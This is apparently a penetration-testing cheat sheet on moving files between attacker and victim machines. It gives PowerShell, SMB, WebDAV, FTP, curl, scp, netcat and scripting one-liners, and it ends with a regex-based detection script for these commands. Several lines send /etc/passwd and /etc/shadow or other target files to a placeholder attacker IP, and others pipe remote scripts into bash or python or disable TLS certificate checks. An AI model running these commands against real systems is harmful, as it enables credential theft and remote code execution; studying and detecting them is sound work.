# File Transfers

## Windows File Transfer Methods

### PowerShell Download

Using `Net.WebClient` and its `DownloadFile` / `DownloadFileAsync` methods

{% code overflow="wrap" lineNumbers="true" %}

```powershell
PS C:\user> (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')

PS C:\user> (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')
```

{% endcode %}

Using Invoke-WebRequest

{% code overflow="wrap" lineNumbers="true" %}

```powershell
PS C:\user> Invoke-WebRequest '<Target File URL>' -OutFile '<Output File Name>' -UseBasicParsing
```

{% endcode %}

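Bypassing SSL/TLS certificate errors. This disables certificate validation for every later request in the same PowerShell session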

{% code overflow="wrap" lineNumbers="true" %}

```powershell
PS C:\user> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
```

{% endcode %}

### PowerShell Upload

On the attacker server, run an upload server

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ python3 -m uploadserver
```

{% endcode %}

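On the victim server, upload files to the server. `Invoke-FileUpload` is not a built-in cmdlet and must be loaded into the session first; `uploadserver` listens on port 8000 by default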

{% code overflow="wrap" lineNumbers="true" %}

```powershell
PS C:\user> Invoke-FileUpload -Uri http://<ATTACKER IP>:8000/upload -File <TARGET FILE>
```

{% endcode %}

Upload by converting to Base64

{% code overflow="wrap" lineNumbers="true" %}

```powershell
PS C:\htb> $b64 = [System.convert]::ToBase64String((Get-Content -Path <TARGET FILE> -Encoding Byte))
PS C:\htb> Invoke-WebRequest -Uri http://<ATTACKER IP>/ -Method POST -Body $b64
```

{% endcode %}

### SMB Download

Create a SMB folder on the attacker server

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ sudo impacket-smbserver share -smb2support /tmp/smbshare
```

{% endcode %}

On the victim, download files from the attacker server

{% code overflow="wrap" lineNumbers="true" %}

```powershell
C:\user> copy \\<ATTACKER IP>\share\nc.exe
```

{% endcode %}

If Windows requires a user and password set on the SMB server, set those up

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
```

{% endcode %}

Mount the drive on the victim

{% code overflow="wrap" lineNumbers="true" %}

```powershell
C:\user> net use n: \\<ATTACKER IP>\share /user:test test
```

{% endcode %}

### SMB Upload

When Windows is given a UNC path, it first attempts to connect using the SMB protocol, and if there's no SMB share available, it tries to connect using HTTP.

Set up an SMB-over-HTTP server using WebDAV on the attacker server

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
```

{% endcode %}

Upload files from the victim server to the attacker server

{% code overflow="wrap" lineNumbers="true" %}

```powershell
C:\user> copy <TARGET FILE> \\<ATTACKER IP>\DavWWWRoot\
```

{% endcode %}

### FTP Download

Host FTP on the attacker server

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ sudo python3 -m pyftpdlib --port 21
```

{% endcode %}

Download files from the victim machine

{% code overflow="wrap" lineNumbers="true" %}

```powershell
PS C:\user> (New-Object Net.WebClient).DownloadFile('ftp://<ATTACKER IP>/file.txt', 'ftp-file.txt')
```

{% endcode %}

Non-Interactive FTP download

{% code overflow="wrap" lineNumbers="true" %}

```powershell
C:\user> echo open 192.168.49.128 > ftpcommand.txt
C:\user> echo USER anonymous >> ftpcommand.txt
C:\user> echo binary >> ftpcommand.txt
C:\user> echo GET file.txt >> ftpcommand.txt
C:\user> echo bye >> ftpcommand.txt
C:\user> ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128
Log in with USER and PASS first.
ftp> USER anonymous

ftp> GET file.txt
ftp> bye

C:\user>more file.txt
This is a test file
```

{% endcode %}

### FTP Uploads

Run an FTP server on the attacker machine

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ sudo python3 -m pyftpdlib --port 21 --write
```

{% endcode %}

Upload files from the victim machine

{% code overflow="wrap" lineNumbers="true" %}

```powershell
PS C:\user> (New-Object Net.WebClient).UploadFile('ftp://<ATTACKER IP>/ftp-hosts', '<TARGET FILE>')
```

{% endcode %}

Non-Interactive FTP upload

{% code overflow="wrap" lineNumbers="true" %}

```powershell
C:\user> echo open <ATTACKER IP> > ftpcommand.txt
C:\user> echo USER anonymous >> ftpcommand.txt
C:\user> echo binary >> ftpcommand.txt
C:\user> echo PUT <TARGET FILE> >> ftpcommand.txt
C:\user> echo bye >> ftpcommand.txt
C:\user> ftp -v -n -s:ftpcommand.txt
ftp> open <ATTACKER IP>

Log in with USER and PASS first.


ftp> USER anonymous
ftp> PUT <TARGET FILE>
ftp> bye
```

{% endcode %}

## Linux File Transfer Methods

### Network Downloads

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ wget https://<ATTACKER IP>/file -O /tmp/file
```

{% endcode %}

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ curl -o /tmp/LinEnum.sh https://<ATTACKER IP>/file
```

{% endcode %}

### Network Uploads

On the attacker server, run an upload server

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ python3 -m pip install --user uploadserver # install uploadserver
$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' # create a self-signed cert
$ python3 -m uploadserver 443 --server-certificate /root/server.pem # start server
```

{% endcode %}

On the victim, upload files to the server. We need to specify `--insecure` because we are using a self-signed cert

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ curl -X POST https://<ATTACKER IP>/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
```

{% endcode %}

### Fileless attacks

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ curl https://<ATTACKER IP>/script.sh | bash
```

{% endcode %}

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ wget -qO- https://<ATTACKER IP>/pythonfile | python3
```

{% endcode %}

### Bash Downloads

Only works if Bash version 2.04 or greater is compiled with `--enable-net-redirections`

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ exec 3<>/dev/tcp/10.10.10.32/80 # Connect to the target server
$ echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3 # GET request
$ cat <&3 # print response
```

{% endcode %}

### SSH/SCP Download

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ scp <ATTACKER USER>@<ATTACKER IP>:/file .
```

{% endcode %}

### SSH/SCP Uploads

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ scp /etc/passwd <ATTACKER USER>@<ATTACKER IP>:/ 
```

{% endcode %}

### Web Servers in other languages

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ python3 -m http.server
$ php -S 0.0.0.0:8000
$ ruby -run -ehttpd . -p8000
```

{% endcode %}

## Transferring Files with Code

### Python

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ python2.7 -c 'import urllib;urllib.urlretrieve ("https://attacker/file", "outputfilename")'
```

{% endcode %}

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ python3 -c 'import urllib.request;urllib.request.urlretrieve("https://attacker/file", "outputfilename")'
```

{% endcode %}

### PHP

{% code overflow="wrap" lineNumbers="true" %}

```bash
php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'
```

{% endcode %}

{% code overflow="wrap" lineNumbers="true" %}

```bash
php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
```

{% endcode %}

{% code overflow="wrap" lineNumbers="true" %}

```bash
php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
```

{% endcode %}

### Ruby

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'
```

{% endcode %}

### Perl

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'
```

{% endcode %}

### JavaScript + cscript

Save the following code as `wget.js`

{% code overflow="wrap" lineNumbers="true" %}

```javascript
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));
```

{% endcode %}

Execute `wget.js` using PowerShell

{% code overflow="wrap" lineNumbers="true" %}

```powershell
> cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1
```

{% endcode %}

### VBScript + cscript

Save the following code as `wget.vbs`

```vba
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with
```

Execute `wget.vbs` using PowerShell

{% code overflow="wrap" lineNumbers="true" %}

```powershell
> cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1
```

{% endcode %}

## Misc Transfers

### Nc

The victim machine listens for incoming data and writes it to a local file

```bash
$ nc -l -p 8000 > /dev/shm/evil
```

Attacker machine sending file over

```bash
$ nc 192.168.49.128 8000 < evil
```

Doing the same over an allowed port (443). Here the sending machine listens and the receiving machine connects

```bash
$ sudo nc -l -p 443 -q 0 < /dev/shm/evil
```

```bash
$ nc 192.168.49.128 443 > evil
```

### RDP

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'
```

{% endcode %}

{% code overflow="wrap" lineNumbers="true" %}

```bash
$ xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer
```

{% endcode %}
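
Seen from the detection side, the command lines on this page leave distinctive strings in process-creation and PowerShell script-block logs. The following is an added example, not part of the original page, that matches those strings with regular expressions; the rule names, host names and sample log lines are constructed for illustration.

```python
import re

# Rules derived from the commands listed on this page: (rule name, pattern).
RULES = [
    ("ps_webclient_transfer", re.compile(r"Net\.WebClient\)?\.(Download|Upload)File", re.I)),
    ("ps_iwr_outfile", re.compile(r"\b(Invoke-WebRequest|iwr)\b.*-OutFile", re.I)),
    ("ps_cert_validation_off", re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    ("cscript_downloader", re.compile(r"\bcscript(\.exe)?\b.*\.(js|vbs)\s+https?://", re.I)),
    ("ftp_scripted", re.compile(r"\bftp(\.exe)?\s.*-s:", re.I)),
    ("webdav_unc_copy", re.compile(r"\\\\[^\\\s]+\\DavWWWRoot", re.I)),
    ("pipe_to_interpreter", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(bash|sh|python[\d.]*)\b", re.I)),
    ("bash_dev_tcp", re.compile(r"/dev/tcp/[\w.\-]+/\d+")),
    ("curl_tls_verify_off", re.compile(r"\bcurl\b.*\s(--insecure|-k)\b")),
]

# Constructed sample events (host, command line); addresses are documentation ranges.
SAMPLE_EVENTS = [
    ("WS01", "powershell (New-Object Net.WebClient).DownloadFile('http://192.0.2.10/nc.exe','nc.exe')"),
    ("WS01", "powershell [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"),
    ("WS02", r"cmd /c copy report.txt \\192.0.2.10\DavWWWRoot\out"),
    ("WS02", "cscript.exe /nologo wget.js https://example.test/tool.ps1 tool.ps1"),
    ("WS02", "ftp -v -n -s:ftpcommand.txt"),
    ("LNX01", "curl https://192.0.2.10/script.sh | bash"),
    ("LNX01", "exec 3<>/dev/tcp/192.0.2.10/80"),
    ("LNX02", "curl -o /tmp/pkg.tgz https://mirror.example.test/pkg.tgz"),  # benign download
]

def match_rules(command_line):
    """Return the names of every rule that matches one logged command line."""
    return [name for name, pattern in RULES if pattern.search(command_line)]

def triage(events):
    """Group rule hits per host: {host: sorted list of rule names}."""
    hits = {}
    for host, command_line in events:
        for name in match_rules(command_line):
            hits.setdefault(host, set()).add(name)
    return {host: sorted(names) for host, names in hits.items()}

if __name__ == "__main__":
    for host, names in triage(SAMPLE_EVENTS).items():
        print(host, ", ".join(names))
```

A plain download such as the `LNX02` line matches nothing, so the rules flag the transfer technique rather than every use of `curl` or `wget`.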

